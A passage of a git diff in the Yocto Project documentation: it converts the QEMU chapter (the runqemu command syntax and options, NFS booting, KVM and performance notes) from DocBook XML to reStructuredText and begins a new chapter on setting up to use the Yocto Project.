+   of the following environment variables (in any order):
+     KERNEL - the kernel image file to use
+     ROOTFS - the rootfs image file or nfsroot directory to use
+     MACHINE - the machine name (optional, autodetected from KERNEL filename if unspecified)
+     Simplified QEMU command-line options can be passed with:
+       nographic - disable video console
+       serial - enable a serial console on /dev/ttyS0
+       slirp - enable user networking, no root privileges is required
+       kvm - enable KVM when running x86/x86_64 (VT-capable CPU required)
+       kvm-vhost - enable KVM with vhost when running x86/x86_64 (VT-capable CPU required)
+       publicvnc - enable a VNC server open to all hosts
+       audio - enable audio
+       [*/]ovmf* - OVMF firmware file or base name for booting with UEFI
+     tcpserial=<port> - specify tcp serial port number
+     biosdir=<dir> - specify custom bios dir
+     biosfilename=<filename> - specify bios filename
+     qemuparams=<xyz> - specify custom parameters to QEMU
+     bootparams=<xyz> - specify custom kernel parameters during boot
+     help, -h, --help: print this text
+
+   Examples:
+     runqemu
+     runqemu qemuarm
+     runqemu tmp/deploy/images/qemuarm
+     runqemu tmp/deploy/images/qemux86/<qemuboot.conf>
+     runqemu qemux86-64 core-image-sato ext4
+     runqemu qemux86-64 wic-image-minimal wic
+     runqemu path/to/bzImage-qemux86.bin path/to/nfsrootdir/ serial
+     runqemu qemux86 iso/hddimg/wic.vmdk/wic.qcow2/wic.vdi/ramfs/cpio.gz...
+     runqemu qemux86 qemuparams="-m 256"
+     runqemu qemux86 bootparams="psplash=false"
+     runqemu path/to/<image>-<machine>.wic
+     runqemu path/to/<image>-<machine>.wic.vmdk
+
+.. _qemu-dev-runqemu-command-line-options:
+
+``runqemu`` Command-Line Options
+================================
+
+Following is a description of ``runqemu`` options you can provide on the
+command line:
+
+.. note::
+
+   If you do provide some "illegal" option combination or perhaps you do
+   not provide enough in the way of options, ``runqemu``
+   provides appropriate error messaging to help you correct the problem.
+
+-  `QEMUARCH`: The QEMU machine architecture, which must be "qemuarm",
+   "qemuarm64", "qemumips", "qemumips64", "qemuppc", "qemux86", or
+   "qemux86-64".
+
+-  `VM`: The virtual machine image, which must be a ``.wic.vmdk``
+   file. Use this option when you want to boot a ``.wic.vmdk`` image.
+   The image filename you provide must contain one of the following
+   strings: "qemux86-64", "qemux86", "qemuarm", "qemumips64",
+   "qemumips", "qemuppc", or "qemush4".
+
+-  `ROOTFS`: A root filesystem that has one of the following filetype
+   extensions: "ext2", "ext3", "ext4", "jffs2", "nfs", or "btrfs". If
+   the filename you provide for this option uses "nfs", it must provide
+   an explicit root filesystem path.
+
+-  `KERNEL`: A kernel image, which is a ``.bin`` file. When you provide a
+   ``.bin`` file, ``runqemu`` detects it and assumes the file is a
+   kernel image.
+
+-  `MACHINE`: The architecture of the QEMU machine, which must be one of
+   the following: "qemux86", "qemux86-64", "qemuarm", "qemuarm64",
+   "qemumips", "qemumips64", or "qemuppc". The MACHINE and QEMUARCH
+   options are basically identical. If you do not provide a MACHINE
+   option, ``runqemu`` tries to determine it based on other options.
+
+-  ``ramfs``: Indicates you are booting an initial RAM disk (initramfs)
+   image, which means the ``FSTYPE`` is ``cpio.gz``.
+
+-  ``iso``: Indicates you are booting an ISO image, which means the
+   ``FSTYPE`` is ``.iso``.
+
+-  ``nographic``: Disables the video console, which sets the console to
+   "ttys0". This option is useful when you have logged into a server and
+   you do not want to disable forwarding from the X Window System (X11)
+   to your workstation or laptop.
+
+-  ``serial``: Enables a serial console on ``/dev/ttyS0``.
+
+-  ``biosdir``: Establishes a custom directory for BIOS, VGA BIOS and
+   keymaps.
+
+-  ``biosfilename``: Establishes a custom BIOS name.
+
+-  ``qemuparams=\"xyz\"``: Specifies custom QEMU parameters. Use this
+   option to pass options other than the simple "kvm" and "serial"
+   options.
+
+-  ``bootparams=\"xyz\"``: Specifies custom boot parameters for the
+   kernel.
+
+-  ``audio``: Enables audio in QEMU. The MACHINE option must be either
+   "qemux86" or "qemux86-64" in order for audio to be enabled.
+   Additionally, the ``snd_intel8x0`` or ``snd_ens1370`` driver must be
+   installed in linux guest.
+
+-  ``slirp``: Enables "slirp" networking, which is a different way of
+   networking that does not need root access but also is not as easy to
+   use or comprehensive as the default.
+
+-  ``kvm``: Enables KVM when running "qemux86" or "qemux86-64" QEMU
+   architectures. For KVM to work, all the following conditions must be
+   met:
+
+   -  Your MACHINE must be either qemux86" or "qemux86-64".
+
+   -  Your build host has to have the KVM modules installed, which are
+      ``/dev/kvm``.
+
+   -  The build host ``/dev/kvm`` directory has to be both writable and
+      readable.
+
+-  ``kvm-vhost``: Enables KVM with VHOST support when running "qemux86"
+   or "qemux86-64" QEMU architectures. For KVM with VHOST to work, the
+   following conditions must be met:
+
+   -  `kvm <#kvm-cond>`__ option conditions must be met.
+
+   -  Your build host has to have virtio net device, which are
+      ``/dev/vhost-net``.
+
+   -  The build host ``/dev/vhost-net`` directory has to be either
+      readable or writable and "slirp-enabled".
+
+-  ``publicvnc``: Enables a VNC server open to all hosts.
diff --git a/documentation/dev-manual/dev-manual-qemu.xml b/documentation/dev-manual/dev-manual-qemu.xml
deleted file mode 100644
index 5ccc0dfe83..0000000000
--- a/documentation/dev-manual/dev-manual-qemu.xml
+++ /dev/null
@@ -1,690 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='dev-manual-qemu'>
-
-<title>Using the Quick EMUlator (QEMU)</title>
-
-    <para>
-        The Yocto Project uses an implementation of the Quick EMUlator (QEMU)
-        Open Source project as part of the Yocto Project development "tool
-        set".
-        This chapter provides both procedures that show you how to use the
-        Quick EMUlator (QEMU) and other QEMU information helpful for
-        development purposes.
-    </para>
-
-    <section id='qemu-dev-overview'>
-        <title>Overview</title>
-
-        <para>
-            Within the context of the Yocto Project, QEMU is an
-            emulator and virtualization machine that allows you to run a
-            complete image you have built using the Yocto Project as just
-            another task on your build system.
-            QEMU is useful for running and testing images and applications on
-            supported Yocto Project architectures without having actual
-            hardware.
-            Among other things, the Yocto Project uses QEMU to run automated
-            Quality Assurance (QA) tests on final images shipped with each
-            release.
-            <note>
-                This implementation is not the same as QEMU in general.
-            </note>
-            This section provides a brief reference for the Yocto Project
-            implementation of QEMU.
-        </para>
-
-        <para>
-            For official information and documentation on QEMU in general, see
-            the following references:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><ulink url='http://wiki.qemu.org/Main_Page'>QEMU Website</ulink>:</emphasis>
-                    The official website for the QEMU Open Source project.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><ulink url='http://wiki.qemu.org/Manual'>Documentation</ulink>:</emphasis>
-                    The QEMU user manual.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='qemu-running-qemu'>
-        <title>Running QEMU</title>
-
-        <para>
-            To use QEMU, you need to have QEMU installed and initialized as
-            well as have the proper artifacts (i.e. image files and root
-            filesystems) available.
-            Follow these general steps to run QEMU:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Install QEMU:</emphasis>
-                    QEMU is made available with the Yocto Project a number of
-                    ways.
-                    One method is to install a Software Development Kit (SDK).
-                    See
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#the-qemu-emulator'>The QEMU Emulator</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (eSDK) manual
-                    for information on how to install QEMU.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Setting Up the Environment:</emphasis>
-                    How you set up the QEMU environment depends on how you
-                    installed QEMU:
-                    <itemizedlist>
-                        <listitem><para>
-                            If you cloned the <filename>poky</filename>
-                            repository or you downloaded and unpacked a
-                            Yocto Project release tarball, you can source
-                            the build environment script (i.e.
-                            <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>):
-                            <literallayout class='monospaced'>
-     $ cd ~/poky
-     $ source oe-init-build-env
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            If you installed a cross-toolchain, you can
-                            run the script that initializes the toolchain.
-                            For example, the following commands run the
-                            initialization script from the default
-                            <filename>poky_sdk</filename> directory:
-                            <literallayout class='monospaced'>
-     . ~/poky_sdk/environment-setup-core2-64-poky-linux
-                            </literallayout>
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Ensure the Artifacts are in Place:</emphasis>
-                    You need to be sure you have a pre-built kernel that
-                    will boot in QEMU.
-                    You also need the target root filesystem for your target
-                    machine’s architecture:
-                    <itemizedlist>
-                        <listitem><para>
-                            If you have previously built an image for QEMU
-                            (e.g. <filename>qemux86</filename>,
-                            <filename>qemuarm</filename>, and so forth),
-                            then the artifacts are in place in your
-                            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                            </para></listitem>
-                        <listitem><para>
-                            If you have not built an image, you can go to the
-                            <ulink url='&YOCTO_MACHINES_DL_URL;'>machines/qemu</ulink>
-                            area and download a pre-built image that matches
-                            your architecture and can be run on QEMU.
-                            </para></listitem>
-                    </itemizedlist></para>
-
-                    <para>See the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extracting-the-root-filesystem'>Extracting the Root Filesystem</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (eSDK) manual
-                    for information on how to extract a root filesystem.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Run QEMU:</emphasis>
-                    The basic <filename>runqemu</filename> command syntax is as
-                    follows:
-                    <literallayout class='monospaced'>
-     $ runqemu [<replaceable>option</replaceable> ]  [...]
-                    </literallayout>
-                    Based on what you provide on the command line,
-                    <filename>runqemu</filename> does a good job of figuring
-                    out what you are trying to do.
-                    For example, by default, QEMU looks for the most recently
-                    built image according to the timestamp when it needs to
-                    look for an image.
-                    Minimally, through the use of options, you must provide
-                    either a machine name, a virtual machine image
-                    (<filename>*wic.vmdk</filename>), or a kernel image
-                    (<filename>*.bin</filename>).</para>
-
-                    <para>Here are some additional examples to help illustrate
-                    further QEMU:
-                    <itemizedlist>
-                        <listitem><para>
-                            This example starts QEMU with
-                            <replaceable>MACHINE</replaceable> set to "qemux86-64".
-                            Assuming a standard
-                            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
-                            <filename>runqemu</filename> automatically finds the
-                            <filename>bzImage-qemux86-64.bin</filename> image file and
-                            the
-                            <filename>core-image-minimal-qemux86-64-20200218002850.rootfs.ext4</filename>
-                            (assuming the current build created a
-                            <filename>core-image-minimal</filename> image).
-                            <note>
-                            When more than one image with the same name exists, QEMU finds
-                            and uses the most recently built image according to the
-                            timestamp.
-                            </note>
-                            <literallayout class='monospaced'>
-     $ runqemu qemux86-64
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            This example produces the exact same results as the
-                            previous example.
-                            This command, however, specifically provides the image
-                            and root filesystem type.
-                            <literallayout class='monospaced'>
-     $ runqemu qemux86-64 core-image-minimal ext4
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            This example specifies to boot an initial RAM disk image
-                            and to enable audio in QEMU.
-                            For this case, <filename>runqemu</filename> set the
-                            internal variable <filename>FSTYPE</filename> to
-                            "cpio.gz".
-                            Also, for audio to be enabled, an appropriate driver must
-                            be installed (see the previous description for the
-                            <filename>audio</filename> option for more information).
-                            <literallayout class='monospaced'>
-     $ runqemu qemux86-64 ramfs audio
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            This example does not provide enough information for
-                            QEMU to launch.
-                            While the command does provide a root filesystem type, it
-                            must also minimally provide a
-                            <replaceable>MACHINE</replaceable>,
-                            <replaceable>KERNEL</replaceable>, or
-                            <replaceable>VM</replaceable> option.
-                            <literallayout class='monospaced'>
-     $ runqemu ext4
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            This example specifies to boot a virtual machine
-                            image (<filename>.wic.vmdk</filename> file).
-                            From the <filename>.wic.vmdk</filename>,
-                            <filename>runqemu</filename> determines the QEMU
-                            architecture (<replaceable>MACHINE</replaceable>) to be
-                            "qemux86-64" and the root filesystem type to be "vmdk".
-                            <literallayout class='monospaced'>
-     $ runqemu /home/scott-lenovo/vm/core-image-minimal-qemux86-64.wic.vmdk
-                            </literallayout>
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='switching-between-consoles'>
-        <title>Switching Between Consoles</title>
-
-        <para>
-            When booting or running QEMU, you can switch between
-            supported consoles by using
-            Ctrl+Alt+<replaceable>number</replaceable>.
-            For example, Ctrl+Alt+3 switches you to the serial console
-            as long as that console is enabled.
-            Being able to switch consoles is helpful, for example, if
-            the main QEMU console breaks for some reason.
-            <note>
-                Usually, "2" gets you to the main console and "3"
-                gets you to the serial console.
-            </note>
-        </para>
-    </section>
-
-    <section id='removing-the-splash-screen'>
-        <title>Removing the Splash Screen</title>
-
-        <para>
-            You can remove the splash screen when QEMU is booting by
-            using Alt+left.
-            Removing the splash screen allows you to see what is
-            happening in the background.
-        </para>
-    </section>
-
-    <section id='disabling-the-cursor-grab'>
-        <title>Disabling the Cursor Grab</title>
-
-        <para>
-            The default QEMU integration captures the cursor within the
-            main window.
-            It does this since standard mouse devices only provide
-            relative input and not absolute coordinates.
-            You then have to break out of the grab using the "Ctrl+Alt"
-            key combination.
-            However, the Yocto Project's integration of QEMU enables
-            the wacom USB touch pad driver by default to allow input
-            of absolute coordinates.
-            This default means that the mouse can enter and leave the
-            main window without the grab taking effect leading to a
-            better user experience.
-        </para>
-    </section>
-
-    <section id='qemu-running-under-a-network-file-system-nfs-server'>
-        <title>Running Under a Network File System (NFS) Server</title>
-
-        <para>
-            One method for running QEMU is to run it on an NFS server.
-            This is useful when you need to access the same file system
-            from both the build and the emulated system at the same time.
-            It is also worth noting that the system does not need root
-            privileges to run.
-            It uses a user space NFS server to avoid that.
-            Follow these steps to set up for running QEMU using an NFS
-            server.
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Extract a Root Filesystem:</emphasis>
-                    Once you are able to run QEMU in your environment, you can
-                    use the <filename>runqemu-extract-sdk</filename> script,
-                    which is located in the <filename>scripts</filename>
-                    directory along with the <filename>runqemu</filename>
-                    script.</para>
-
-                    <para>The <filename>runqemu-extract-sdk</filename> takes a
-                    root filesystem tarball and extracts it into a location
-                    that you specify.
-                    Here is an example that takes a file system and
-                    extracts it to a directory named
-                    <filename>test-nfs</filename>:
-                    <literallayout class='monospaced'>
-     runqemu-extract-sdk ./tmp/deploy/images/qemux86-64/core-image-sato-qemux86-64.tar.bz2 test-nfs
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Start QEMU:</emphasis>
-                    Once you have extracted the file system, you can run
-                    <filename>runqemu</filename> normally with the additional
-                    location of the file system.
-                    You can then also make changes to the files within
-                    <filename>./test-nfs</filename> and see those changes
-                    appear in the image in real time.
-                    Here is an example using the <filename>qemux86</filename>
-                    image:
-                    <literallayout class='monospaced'>
-     runqemu qemux86-64 ./test-nfs
-                    </literallayout>
-                    </para></listitem>
-            </orderedlist>
-            <note>
-                <para>
-                    Should you need to start, stop, or restart the NFS share,
-                    you can use the following commands:
-                    <itemizedlist>
-                        <listitem><para>
-                            The following command starts the NFS share:
-                            <literallayout class='monospaced'>
-     runqemu-export-rootfs start <replaceable>file-system-location</replaceable>
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            The following command stops the NFS share:
-                            <literallayout class='monospaced'>
-         runqemu-export-rootfs stop <replaceable>file-system-location</replaceable>
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            The following command restarts the NFS share:
-                            <literallayout class='monospaced'>
-     runqemu-export-rootfs restart <replaceable>file-system-location</replaceable>
-                            </literallayout>
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </note>
-        </para>
-    </section>
-
-    <section id='qemu-kvm-cpu-compatibility'>
-        <title>QEMU CPU Compatibility Under KVM</title>
-
-        <para>
-            By default, the QEMU build compiles for and targets 64-bit and x86
-            <trademark class='registered'>Intel</trademark> <trademark class='trademark'>Core</trademark>2
-            Duo processors and 32-bit x86
-            <trademark class='registered'>Intel</trademark> <trademark class='registered'>Pentium</trademark>
-            II processors.
-            QEMU builds for and targets these CPU types because they display
-            a broad range of CPU feature compatibility with many commonly
-            used CPUs.
-        </para>
-
-        <para>
-            Despite this broad range of compatibility, the CPUs could support
-            a feature that your host CPU does not support.
-            Although this situation is not a problem when QEMU uses software
-            emulation of the feature, it can be a problem when QEMU is
-            running with KVM enabled.
-            Specifically, software compiled with a certain CPU feature crashes
-            when run on a CPU under KVM that does not support that feature.
-            To work around this problem, you can override QEMU's runtime CPU
-            setting by changing the <filename>QB_CPU_KVM</filename>
-            variable in <filename>qemuboot.conf</filename> in the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory's</ulink>
-            <filename>deploy/image</filename> directory.
-            This setting specifies a <filename>-cpu</filename> option
-            passed into QEMU in the <filename>runqemu</filename> script.
-            Running <filename>qemu -cpu help</filename> returns a list of
-            available supported CPU types.
-        </para>
-    </section>
-
-    <section id='qemu-dev-performance'>
-        <title>QEMU Performance</title>
-
-        <para>
-            Using QEMU to emulate your hardware can result in speed issues
-            depending on the target and host architecture mix.
-            For example, using the <filename>qemux86</filename> image in the
-            emulator on an Intel-based 32-bit (x86) host machine is fast
-            because the target and host architectures match.
-            On the other hand, using the <filename>qemuarm</filename> image
-            on the same Intel-based host can be slower.
-            But, you still achieve faithful emulation of ARM-specific issues.
-        </para>
-
-        <para>
-            To speed things up, the QEMU images support using
-            <filename>distcc</filename> to call a cross-compiler outside the
-            emulated system.
-            If you used <filename>runqemu</filename> to start QEMU, and the
-            <filename>distccd</filename> application is present on the host
-            system, any BitBake cross-compiling toolchain available from the
-            build system is automatically used from within QEMU simply by
-            calling <filename>distcc</filename>.
-            You can accomplish this by defining the cross-compiler variable
-            (e.g. <filename>export CC="distcc"</filename>).
-            Alternatively, if you are using a suitable SDK image or the
-            appropriate stand-alone toolchain is present, the toolchain is
-            also automatically used.
-            <note>
-                Several mechanisms exist that let you connect to the system
-                running on the QEMU emulator:
-                <itemizedlist>
-                    <listitem><para>
-                        QEMU provides a framebuffer interface that makes
-                        standard consoles available.
-                        </para></listitem>
-                    <listitem><para>
-                        Generally, headless embedded devices have a serial port.
-                        If so, you can configure the operating system of the
-                        running image to use that port to run a console.
-                        The connection uses standard IP networking.
-                        </para></listitem>
-                    <listitem><para>
-                        SSH servers exist in some QEMU images.
-                        The <filename>core-image-sato</filename> QEMU image
-                        has a Dropbear secure shell (SSH) server that runs
-                        with the root password disabled.
-                        The <filename>core-image-full-cmdline</filename> and
-                        <filename>core-image-lsb</filename> QEMU images
-                        have OpenSSH instead of Dropbear.
-                        Including these SSH servers allow you to use standard
-                        <filename>ssh</filename> and <filename>scp</filename>
-                        commands.
-                        The <filename>core-image-minimal</filename> QEMU image,
-                        however, contains no SSH server.
-                        </para></listitem>
-                    <listitem><para>
-                        You can use a provided, user-space NFS server to boot
-                        the QEMU session using a local copy of the root
-                        filesystem on the host.
-                        In order to make this connection, you must extract a
-                        root filesystem tarball by using the
-                        <filename>runqemu-extract-sdk</filename> command.
-                        After running the command, you must then point the
-                        <filename>runqemu</filename>
-                        script to the extracted directory instead of a root
-                        filesystem image file.
-                        See the
-                        "<link linkend='qemu-running-under-a-network-file-system-nfs-server'>Running Under a Network File System (NFS) Server</link>"
-                        section for more information.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-    </section>
-
-    <section id='qemu-dev-command-line-syntax'>
-        <title>QEMU Command-Line Syntax</title>
-
-        <para>
-            The basic <filename>runqemu</filename> command syntax is as
-            follows:
-            <literallayout class='monospaced'>
-     $ runqemu [<replaceable>option</replaceable> ]  [...]
-            </literallayout>
-            Based on what you provide on the command line,
-            <filename>runqemu</filename> does a good job of figuring out what
-            you are trying to do.
-            For example, by default, QEMU looks for the most recently built
-            image according to the timestamp when it needs to look for an
-            image.
-            Minimally, through the use of options, you must provide either
-            a machine name, a virtual machine image
-            (<filename>*wic.vmdk</filename>), or a kernel image
-            (<filename>*.bin</filename>).
-        </para>
-
-        <para>
-            Following is the command-line help output for the
-            <filename>runqemu</filename> command:
-            <literallayout class='monospaced'>
-     $ runqemu --help
-
-     Usage: you can run this script with any valid combination
-     of the following environment variables (in any order):
-       KERNEL - the kernel image file to use
-       ROOTFS - the rootfs image file or nfsroot directory to use
-       MACHINE - the machine name (optional, autodetected from KERNEL filename if unspecified)
-       Simplified QEMU command-line options can be passed with:
-         nographic - disable video console
-         serial - enable a serial console on /dev/ttyS0
-         slirp - enable user networking, no root privileges is required
-         kvm - enable KVM when running x86/x86_64 (VT-capable CPU required)
-         kvm-vhost - enable KVM with vhost when running x86/x86_64 (VT-capable CPU required)
-         publicvnc - enable a VNC server open to all hosts
-         audio - enable audio
-         [*/]ovmf* - OVMF firmware file or base name for booting with UEFI
-       tcpserial=&lt;port&gt; - specify tcp serial port number
-       biosdir=&lt;dir&gt; - specify custom bios dir
-       biosfilename=&lt;filename&gt; - specify bios filename
-       qemuparams=&lt;xyz&gt; - specify custom parameters to QEMU
-       bootparams=&lt;xyz&gt; - specify custom kernel parameters during boot
-       help, -h, --help: print this text
-
-     Examples:
-       runqemu
-       runqemu qemuarm
-       runqemu tmp/deploy/images/qemuarm
-       runqemu tmp/deploy/images/qemux86/&lt;qemuboot.conf&gt;
-       runqemu qemux86-64 core-image-sato ext4
-       runqemu qemux86-64 wic-image-minimal wic
-       runqemu path/to/bzImage-qemux86.bin path/to/nfsrootdir/ serial
-       runqemu qemux86 iso/hddimg/wic.vmdk/wic.qcow2/wic.vdi/ramfs/cpio.gz...
-       runqemu qemux86 qemuparams="-m 256"
-       runqemu qemux86 bootparams="psplash=false"
-       runqemu path/to/&lt;image&gt;-&lt;machine&gt;.wic
-       runqemu path/to/&lt;image&gt;-&lt;machine&gt;.wic.vmdk
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='qemu-dev-runqemu-command-line-options'>
-        <title><filename>runqemu</filename> Command-Line Options</title>
-
-        <para>
-            Following is a description of <filename>runqemu</filename>
-            options you can provide on the command line:
-            <note><title>Tip</title>
-                If you do provide some "illegal" option combination or perhaps
-                you do not provide enough in the way of options,
-                <filename>runqemu</filename> provides appropriate error
-                messaging to help you correct the problem.
-            </note>
-            <itemizedlist>
-                <listitem><para>
-                    <replaceable>QEMUARCH</replaceable>:
-                    The QEMU machine architecture, which must be "qemuarm",
-                    "qemuarm64", "qemumips", "qemumips64", "qemuppc",
-                    "qemux86", or "qemux86-64".
-                    </para></listitem>
-                <listitem><para>
-                    <filename><replaceable>VM</replaceable></filename>:
-                    The virtual machine image, which must be a
-                    <filename>.wic.vmdk</filename> file.
-                    Use this option when you want to boot a
-                    <filename>.wic.vmdk</filename> image.
-                    The image filename you provide must contain one of the
-                    following strings: "qemux86-64", "qemux86", "qemuarm",
-                    "qemumips64", "qemumips", "qemuppc", or "qemush4".
-                    </para></listitem>
-                <listitem><para>
-                    <replaceable>ROOTFS</replaceable>:
-                    A root filesystem that has one of the following
-                    filetype extensions: "ext2", "ext3", "ext4", "jffs2",
-                    "nfs", or "btrfs".
-                    If the filename you provide for this option uses “nfs�, it
-                    must provide an explicit root filesystem path.
-                    </para></listitem>
-                <listitem><para>
-                    <replaceable>KERNEL</replaceable>:
-                    A kernel image, which is a <filename>.bin</filename> file.
-                    When you provide a <filename>.bin</filename> file,
-                    <filename>runqemu</filename> detects it and assumes the
-                    file is a kernel image.
-                    </para></listitem>
-                <listitem><para>
-                    <replaceable>MACHINE</replaceable>:
-                    The architecture of the QEMU machine, which must be one
-                    of the following: "qemux86", "qemux86-64", "qemuarm",
-                    "qemuarm64", "qemumips", “qemumips64", or "qemuppc".
-                    The <replaceable>MACHINE</replaceable> and
-                    <replaceable>QEMUARCH</replaceable> options are basically
-                    identical.
-                    If you do not provide a <replaceable>MACHINE</replaceable>
-                    option, <filename>runqemu</filename> tries to determine
-                    it based on other options.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>ramfs</filename>:
-                    Indicates you are booting an initial RAM disk (initramfs)
-                    image, which means the <filename>FSTYPE</filename> is
-                    <filename>cpio.gz</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>iso</filename>:
-                    Indicates you are booting an ISO image, which means the
-                    <filename>FSTYPE</filename> is
-                    <filename>.iso</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>nographic</filename>:
-                    Disables the video console, which sets the console to
-                    "ttys0".
-                    This option is useful when you have logged into a server
-                    and you do not want to disable forwarding from the
-                    X Window System (X11) to your workstation or laptop.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>serial</filename>:
-                    Enables a serial console on
-                    <filename>/dev/ttyS0</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>biosdir</filename>:
-                    Establishes a custom directory for BIOS, VGA BIOS and
-                    keymaps.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>biosfilename</filename>:
-                    Establishes a custom BIOS name.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>qemuparams=\"<replaceable>xyz</replaceable>\"</filename>:
-                    Specifies custom QEMU parameters.
-                    Use this option to pass options other than the simple
-                    "kvm" and "serial" options.
-                    </para></listitem>
-                <listitem><para><filename>bootparams=\"<replaceable>xyz</replaceable>\"</filename>:
-                    Specifies custom boot parameters for the kernel.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>audio</filename>:
-                    Enables audio in QEMU.
-                    The <replaceable>MACHINE</replaceable> option must be
-                    either "qemux86" or "qemux86-64" in order for audio to be
-                    enabled.
-                    Additionally, the <filename>snd_intel8x0</filename>
-                    or <filename>snd_ens1370</filename> driver must be
-                    installed in linux guest.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>slirp</filename>:
-                    Enables "slirp" networking, which is a different way
-                    of networking that does not need root access
-                    but also is not as easy to use or comprehensive
-                    as the default.
-                    </para></listitem>
-                <listitem><para id='kvm-cond'>
-                    <filename>kvm</filename>:
-                    Enables KVM when running "qemux86" or "qemux86-64"
-                    QEMU architectures.
-                    For KVM to work, all the following conditions must be met:
-                    <itemizedlist>
-                        <listitem><para>
-                            Your <replaceable>MACHINE</replaceable> must be either
-qemux86" or "qemux86-64".
-                            </para></listitem>
-                        <listitem><para>
-                            Your build host has to have the KVM modules
-                            installed, which are
-                            <filename>/dev/kvm</filename>.
-                            </para></listitem>
-                        <listitem><para>
-                            The  build host <filename>/dev/kvm</filename>
-                            directory has to be both writable and readable.
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>kvm-vhost</filename>:
-                    Enables KVM with VHOST support when running "qemux86"
-                    or "qemux86-64" QEMU architectures.
-                    For KVM with VHOST to work, the following conditions must
-                    be met:
-                    <itemizedlist>
-                        <listitem><para>
-                            <link linkend='kvm-cond'>kvm</link> option
-                            conditions must be met.
-                            </para></listitem>
-                        <listitem><para>
-                            Your build host has to have virtio net device, which
-                            are <filename>/dev/vhost-net</filename>.
-                            </para></listitem>
-                        <listitem><para>
-                            The build host <filename>/dev/vhost-net</filename>
-                            directory has to be either readable or writable
-                            and “slirp-enabled�.
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>publicvnc</filename>:
-                    Enables a VNC server open to all hosts.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/dev-manual/dev-manual-start.rst b/documentation/dev-manual/dev-manual-start.rst
new file mode 100644
index 0000000000..6a330d4a32
--- /dev/null
+++ b/documentation/dev-manual/dev-manual-start.rst
@@ -0,0 +1,926 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************************
+Setting Up to Use the Yocto Project
+***********************************
+
+This chapter provides guidance on how to prepare to use the Yocto
+Project. You can learn about creating a team environment to develop
+using the Yocto Project, how to set up a :ref:`build
+host <dev-manual/dev-manual-start:preparing the build host>`, how to locate
+Yocto Project source repositories, and how to create local Git
+repositories.
+
+.. _usingpoky-changes-collaborate:
+
+Creating a Team Development Environment
+=======================================
+
+It might not be immediately clear how you can use the Yocto Project in a
+team development environment, or how to scale it for a large team of
+developers. You can adapt the Yocto Project to many different use cases
+and scenarios; however, this flexibility could cause difficulties if you
+are trying to create a working setup that scales effectively.
+
+To help you understand how to set up this type of environment, this
+section presents a procedure that gives you information that can help
+you get the results you want. The procedure is high-level and presents
+some of the project's most successful experiences, practices, solutions,
+and available technologies that have proved to work well in the past;
+however, keep in mind, the procedure here is simply a starting point.
+You can build off these steps and customize the procedure to fit any
+particular working environment and set of practices.
+
+1.  *Determine Who is Going to be Developing:* You first need to
+    understand who is going to be doing anything related to the Yocto
+    Project and determine their roles. Making this determination is
+    essential to completing subsequent steps, which are to get your
+    equipment together and set up your development environment's
+    hardware topology.
+
+    The following roles exist:
+
+    -  *Application Developer:* This type of developer does application
+       level work on top of an existing software stack.
+
+    -  *Core System Developer:* This type of developer works on the
+       contents of the operating system image itself.
+
+    -  *Build Engineer:* This type of developer manages Autobuilders and
+       releases. Depending on the specifics of the environment, not all
+       situations might need a Build Engineer.
+
+    -  *Test Engineer:* This type of developer creates and manages
+       automated tests that are used to ensure all application and core
+       system development meets desired quality standards.
+
+2.  *Gather the Hardware:* Based on the size and make-up of the team,
+    get the hardware together. Ideally, any development, build, or test
+    engineer uses a system that runs a supported Linux distribution.
+    These systems, in general, should be high performance (e.g. dual,
